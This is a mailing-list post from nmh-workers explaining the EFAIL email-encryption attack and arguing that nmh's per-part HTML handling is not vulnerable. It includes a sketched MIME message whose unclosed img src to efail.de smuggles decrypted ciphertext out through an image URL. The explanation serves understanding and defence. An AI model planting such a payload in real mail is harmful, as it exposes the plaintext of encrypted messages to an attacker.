>Michael Richardson writes: >> And given EFAIL, it seems that we were wise. > >nmh wise? I dunno. Part of EFAIL was that the mail client downloaded >bits from the Internet and interleaved them seamlessly into the message. >That seems like an inherently dangerous thing to do... and nmh does it >with one of the messages in this very thread: Ralph Corderoy's message >contains a 'Content-Type: message/external-body; access-type="url"; >url="..."' bit that was promptly fetched and displayed in the middle of >the message. How do I disable this behavior, and why does nmh have it >turned ON by default!?
Respectfully ... the vulnerability with EFAIL was NOT that people downloaded stuff via HTTP. Kind of the exact opposite, actually ... MUAs were given a previously-encrypted message and tricked into decrypting it and uploading it by stitching together HTML content across multiple MIME parts. E.g.: --BOUNDARY Content-Type: text/html <img src="http://efail.de/ --BOUNDARY Content-Type: application/pkcs7-mime; [...] Content-Transfer-Encoding: bae64 [... message attacker wants to decrypt ...] --BOUNDARY "> --BOUNDARY-- A poorly-written MUA would decrypt the message and then "fetch" the image because they would interpret all of the HTML parts as one continuous HTML content (notice the opening quote in the first HTML part does not contain a closing quote), and the URL would contain the decrypted text the attacker is interested in (presumably they got that via some other mechanism). And it turns out there are a lot of poorly- written MUAs! I looked at this when it came out; I do not believe that even if we supported S/MIME or OpenPGP natively we would be vulnerable to EFAIL, because we pass each HTML part to it's own HTML converter, so there is no HTML "state" that would be preserved across multipart boundaries. And even if it was an issue, they default HTML-to-text converters we use do not fetch images. To the larger point ... I do not think there is any fundamental difference between being emailed a text/plain part and fetching it via HTTP; they both are coming across the wild Internet, and I think this applies to any content. The only possible disadvantage I can think of is that it would evade a virus checker than runs on your mail server, but since relatively few MUAs support message/external-body messages now I suspect it's highly unlikely that anyone would choose to distribute a virus in this way. I am open to being proven wrong, of course. --Ken -- nmh-workers https://lists.nongnu.org/mailman/listinfo/nmh-workers
